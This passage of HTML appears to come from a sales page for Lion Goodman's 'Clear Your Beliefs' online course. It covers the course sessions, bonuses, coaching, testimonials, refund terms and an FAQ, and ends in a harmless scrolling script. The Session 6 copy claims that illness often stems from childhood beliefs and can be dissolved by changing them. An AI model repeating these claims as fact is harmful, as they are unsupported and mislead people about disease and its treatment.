don''t need this session.  But most of us think too small...\n\n</div>\n<div class="module_body">\n\nOur <em><strong>will</strong></em> has been weakened from lack of use – like muscles that shrink when they''re not exercised.  We let our negative beliefs stop us. You may hear internal voices say, <em>"What''s the use?  You''ll fail anyway. You don''t deserve happiness – look at you!"  </em>We were shamed into thinking that we were less than others.We learned to compare ourselves to others – and we always lose that contest.  Clear out any apparent limitations you''ve taken on, and find your true power to create what you want.  Do whatever you need to do in order to achieve your vision.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">Do you have beliefs that stop you from dreaming big, or following through? Do you procrastinate or get distracted? In this session, you''ll eliminate those beliefs and relieve yourself of those symptoms. You''re already a master manifestor – you''re just manifesting your old programs!</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 3, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and creating the life you want</li>\n	<li>Dissolve the old beliefs that get in your way over and over, or make you quit when you''re partway there.</li>\n	<li>Imagine what it means to live without self-imposed limitations, trusting that you can create anything you want</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 4:   </span><strong>Clear Your Outdated Beliefs About Love and Relationships</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4.jpg"><img class=" wp-image-312 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess4-300x177.jpg" alt="sess4" width="237" height="141" /></a>In this session, you''ll delete beliefs that interfere with your personal relationships.\n\nIf you''re married, are you happy and secure?   Or are you anxious about the future?   If you''re not in a relationship, what''s holding you back from finding your ideal mate?\n\nHumans are social creatures – we must relate to others to survive.  At our core, we want a security and safety, but we also want passion and romance.  You learned "what love is" from your parents – so it''s no wonder that you''re confused!  Most of us repeat patterns we learned from our early childhood.  We watched our parents interact, and Mom and Dad''s relationship became our model of what a relationship is supposed to look like.  In your family, love may have been  contaminated by disdain, contempt, withdrawal, or abuse.  We were programmed to repeat their patterns – without conscious choice.  This session looks at early infant bonding patterns and how those patterns get reproduced in our adult relationships unconsciously – until we change them.\n\n</div>\n&nbsp;\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 4, you will:</strong>\n<ul>\n	<li>Look deeply into the childhood patterns that enabled you to survive and thrive</li>\n	<li>See which of your beliefs now interfere with your intimate relationships</li>\n	<li>Discover how easy it is to shift these beliefs at the core of the psyche and transform relationship difficulties into vibrant, loving interactions</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 5:   </span><strong>Clear Your Old Beliefs About Money and Work</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5.jpg"><img class=" wp-image-313 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess5-300x200.jpg" alt="sess5" width="222" height="148" /></a>In this session, you''ll focus on money, wealth and abundance – or the lack thereof!\n\nWhat do you believe about earning a living in today''s economy?   Is money really the root of all evil?\n\nIf you want to experience true abundance, you have to eliminate the belief that money is bad – or a problem.   Your current financial state is a reflection of the beliefs you inherited from your family, religion, and culture.   Can you see their influence?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 5, you will:</strong>\n<ul>\n	<li>Examine your family and cultural beliefs about money, work, poverty and "deservingness."</li>\n	<li>Remove beliefs that create stumbling blocks in the way of natural abundance</li>\n	<li>Create new beliefs that enable you to open to the flow of money and resources, and the life of abundance you want - and deserve</li>\n	<li>Learn why affirmations alone, and the "Law of Attraction," don''t work, regardless of how diligently you practice them</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 6:   </span><strong>Clear Uncomfortable Beliefs About Your Body and Health</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg"><img class=" wp-image-314 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/sess6.jpg" alt="sess6" width="205" height="136" /></a>In this session, you''ll focus on issues and problems with your health – whether they appear in your physical, emotional, mental or spiritual body.\n\nIll health (dis-ease) is often the result of beliefs that were indoctrinated into you, or conclusions you came to when you came to certain conclusions during your early childhood.  What do you believe and perceive about your body?   Your health?  Your age?  Your vitality?  Your ability to heal?  The future of your health?\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 6, you will:</strong>\n<ul>\n	<li>Identify old beliefs that stand between you and vibrant health</li>\n	<li>Recognize beliefs that make you vulnerable to disease and injury</li>\n	<li>Dissolve old beliefs at the root of illness, bad habits and lifestyle stress</li>\n	<li>Imagine the healthy, vibrant body you want, and create it consciously with new beliefs</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h">\n<h5><span class="session">Session 7:   </span><strong>Clear Out The Rest Of The Junk In Your BeliefCloset!</strong></h5>\n</div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you''ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\n\nYou''ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\n\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you''ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\n\n</div>\n<div class="module_body"></div>\n<div class="module_body">\n\n<strong> In Session 7, you will:</strong>\n<ul>\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\n</ul>\n</div>\n</div>\n<!--[wpfcNOT]-->\n\n&nbsp;\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\nIn addition to these seven transformational sessions, you''ll also receive these awesome bonus interviews and gifts.  These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\n\n&nbsp;\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #1:  <strong>Love:  What Makes It So Confusing?\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3.jpg"><img class="alignleft  wp-image-1053" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/Carista-Portrait-3-232x300.jpg" alt="Carista Portrait 3" width="161" height="209" /></a>We all want more love in our life, but something keeps getting in the way.  We can''t seem to stop hurting each other. What''s going on?\n\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.  (She is also known as <em>Lion''s fiance''</em>)\n\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We''re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\n\nLearn how to determine your own (and your partner''s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2).  You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\n<strong>\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute.  She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations.  Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em>  In partnership with Lion, she developed LLI''s leading-edge evolutionary leadership program.   After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\n<div class="module_body">\n\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships. Developed by Carista Luminare and Lion Goodman, you''ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\n<div class="module_body">\n\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You''ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world''s leading experts on the Chakras.  Her books have sold more than 500,000 copies worldwide.\n\n</div>\n<div class="module_body">\n\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world.  You''ll receive the first two chapters of the book as Bonus #4, below.\n\n</div>\n<div class="module_body">\n\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>.  She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world.  Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\n\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\n<div class="module_body">\n\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\n<ul style="padding-left: 20px;">\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\n	<li>Learn a process that can strengthen your power of intention</li>\n</ul>\n</div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Change Your Beliefs eBook</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png"><img class=" wp-image-433 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/07/Clear-your-beliefs-ebook.png" alt="TYB Cover" width="159" height="206" /></a>\n\n</div>\n<div class="module_body">\n\nYou''ll also receive a copy of Lion''s multimedia eBook, "<em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>" \n\nLion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why you do what you do, and why it''s so difficult to change your habitual patterns of thought and behavior. \n\nIt''s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\n\n</div>\n<div class="module_body"></div>\n</div>\n<img class="no-shad seprit aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="module">\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\n<div class="module_body">\n\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg"><img class="alignleft  wp-image-985" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding-300x199.jpg" alt="ReportsLanding" width="148" height="98" /></a>You''ll also receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\n\n</div>\n</div>\n&nbsp;\n<h1 id="bonus">Your Professional Coaching Sessions</h1>\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="195" height="165" /></a>If you''re registering as part of a Clear Your Beliefs Coaching program, you''ll work with your <em>Clear Your Beliefs Coach</em> weekly. He or she will accompany you on your journey and guide you, step-by-step, through the process.\n\n<em>Clear Your Beliefs Coaches</em> have been trained to help you deal with almost any issue, regardless of how long it''s been interfering with your life. Your coach will safely guide you down to the deepest levels of your psyche – which can be difficult to get to all by yourself – yet it''s where the most powerful changes occur.  He or she will meet with you by phone (or Skype) each week, on a day that fits your schedule, at a time that''s convenient for you.\n\nYour coach will guide you through any difficult inner terrain you might encounter, and help you identify and delete difficult-to-locate core beliefs.\n\n<strong>[Note: Our coaches help you change your own beliefs and reduce or eliminate the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</strong>\n<h1 id="package"></h1>\n<p style="text-align: right;"><a href="http://clearyourbeliefs.com/program/#top"><font color="#2E2EFE">Up To Top</a></font></p>\n&nbsp;\n<div class="icon_box" style="background: #EFF8FB; width: 500px; margin: 17px auto;">\n<h1>Purchase Today and You''ll Receive:</h1>\n<strong>Seven 90-Minute Class Sessions</strong> – Learn one of the world''s most powerful belief-change technologies, from the comfort of your own home. Each class session gives you the skill to easily change your beliefs – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. Listen online, or download high-quality MP3s and listen anytime.\n<h3 style="font-size: 20px;">Plus: <em>The Entire BONUS Collection:</em></h3>\n<ul class="icon_box-ul">\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\n	<li><strong>A complete set of PDF Transcripts</strong> of all seven classes plus two bonus calls.</li>\n	<li><strong>Optional:</strong> Professional Coaching Sessions.</li>\n</ul>\n<div class="clear"></div>\n&nbsp;\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n\n</div>\n<h1>Satisfaction Guaranteed</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)\n\n&nbsp;\n<h1>About Lion Goodman</h1>\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\n\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Clear Your Beliefs: Delete Your Limiting Beliefs and Transform Your Life.</em>\n\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\n\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men''s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men''s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\n\n&nbsp;\n\n&nbsp;\n<div class="icon_box">\n<h1>Praise for Lion and Clear Your Beliefs</h1>\n<div class="quot">\n\n<em>"You helped me resolve in a short time issues in my life that I''ve struggled with for years. In addition, I can use the tools you''ve taught me to deal with any difficult circumstance that may appear in the future."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>– G. J., software developer</strong></div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Lion''s decades of experience in all facets of transformation combined with his profound love, great sense of humor and powerful commitment to humanity make him an outstanding facilitator for awakening and liberation. If you choose to work with him, you''ll grow to love him, as I do."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Stephen Dinan, CEO and founder, The Shift Network</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"In just one BeliefCloset session, I experienced a subtle and profound shift in the way I relate to my children. It continues to enrich the way I''m able to be fully present with them each and every day."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Jamee Tenzer, Life Coaching for Working Women</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"Thank you taking me back to the beginning to help me hit the "reset" button. You demonstrated your mastery and provided an unbelievable learning opportunity. Thank you for showing me that there are no limits in the Imaginal Realm, and for reinforcing the power that resides in the BeliefCloset Process. I am humbled and very grateful. I may never truly be able to comprehend all that happened and the changes to my mindset and my life. I wish I could put how I feel into words. My outlook is brighter, my steps seems lighter, and losing weight is now just an overdue task to take care of, without all the shame and emotions that had always been attached to it. "</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ S.K., Life Coach, Ontario, Canada </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"What an extraordinary experience! The process is simple, straightforward, powerful, and FUN! Changing beliefs is no longer a heavy, ponderous, months-long process. I finished my session with a smile, and the anxiety triggered by my old beliefs has disappeared. My new ''belief-outfits'' are perfect for me, and I''m wearing them with joy and enthusiasm!"</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong>~ D. T., Physical Therapist, Denver, CO </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process is like a magic wand – I can easily and quickly change any aspect of myself by changing my beliefs."</em>\n<div class="writer-quote" style="text-align: right; margin-right: 60px;"><strong> ~ T. S., Business Owner, Yukon, Canada</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process gave me the room to safely acknowledge and work through my hidden, unconscious beliefs. I am now free of the past and can see myself more clearly than ever before."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ T. L., Healer, Stamford, CT </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n\n</div>\n<div class="quot">\n\n<em>"I uncovered beliefs I didn''t know I had, including: "<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God."</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"This valuable tool will enhance your life in ways you cannot imagine. It''s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>~ C.T., Performance and Life Coach</strong></div>\n</div>\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\n<div class="quot">\n\n<em>"I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them."</em>\n<div class="writer-quote" style="text-align: right; right;margin-right: 60px;"><strong>– M.M., International Business Consultant</strong></div>\n<div style="text-align: right;"></div>\n</div>\n&nbsp;\n\n</div>\n<div class="cb inside">\n\n&nbsp;\n\n<a href="http://clearyourbeliefs.com/products_categories/coaching" target="_blank"><button class="btn first" style="margin-top: 80px;">Select Your Plan</button></a>\n<p style="text-align: center;">OR</p>\n<a href="http://clearyourbeliefs.com/free-ebook" target="_blank"><button class="btn">Free eBook</button></a>\n\n</div>\n&nbsp;\n<h1>Satisfaction Guaranteed</h1>\n<p><a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don''t absolutely LOVE the Clear Your Beliefs program, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we''ll happily issue you a full refund. You can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program. CYB Coaches are responsible for their own refund policy and any refunds for unused coaching hours.)</p>\n\n&nbsp;\n<h1>Frequently Asked Questions</h1>\n\n<div class="parg-text"><p><strong>Q: What is a virtual course?</strong></p></div>\n\n<div class="parg-text"><p>A: It''s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you''ll work by phone or Skype at a time that''s most convenient to you.</p></div>\n\n<div class="parg-text"><p>In addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.</p></div>\n\n<div class="parg-text"><p><strong>Q: How long will I have access to the course?</strong></p></div>\n\n<div class="parg-text"><p>A: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you''ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: Are there scholarships available?</strong></p></div>\n\n<div class="parg-text"><p>A: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to <a href="mailto:info@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">info@clearyourbeliefs.com</a></font>, with a description of your circumstances and your offer of what you can pay.</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your refund policy?</strong></p></div>\n\n<div class="parg-text"><p>A: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.</p></div>\n\n<div class="parg-text"><p><strong>Q: How can I reach Customer Support?</strong></p></div>\n\n<div class="parg-text"><p>A: Please send an email to <a href="mailto:support@clearyourbeliefs.com"><FONT COLOR="#2E2EFE">support@clearyourbeliefs.com</a></font>. We''ll get back to you within 48 hours (sometimes longer over weekends).</p></div>\n\n<div class="parg-text"><p><strong>Q: What is your Privacy Policy?</strong></p></div>\n\n<div class="parg-text"><p>A: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from <a href="http://www.ClearYourBeliefs.com" target="_blank" ><FONT COLOR="#2E2EFE">ClearYourBeliefs.com</a></font>, <a href="http://www.BeliefCloset.com" target="_blank" ><FONT COLOR="#2E2EFE">BeliefCloset.com</a></font>, or <a href="http://www.ConfusedAboutLove.com" target="_blank" ><FONT COLOR="#2E2EFE">ConfusedAboutLove.com.</a></font></p></div>\n\n<div class="parg-text"><p>You may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.</p></div>\n\n<div class="parg-text"><p>All information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.</p></div>\n\n<script>// <![CDATA[\njQuery(document).ready(function() {  var is_chrome = window.chrome;   if (is_chrome) {  jQuery(''h5.hdr'').css(''text-size'', ''51px!important'');  jQuery(''h5.hdr'').animate({     fontSize: ''51px''  }, 100);  }  });\njQuery(function(){jQuery(''a[href*=#]:not([href=#])'').click(function() {if (location.pathname.replace(/^//,'''') == this.pathname.replace(/^//,'''') && location.hostname == this.hostname){var target = jQuery(this.hash);target = target.length ? target : jQuery(''[name='' + this.hash.slice(1) +'']'');if (target.length){jQuery(''html,body'').animate({scrollTop: target.offset().top}, 1000);return false;}}});});\n// 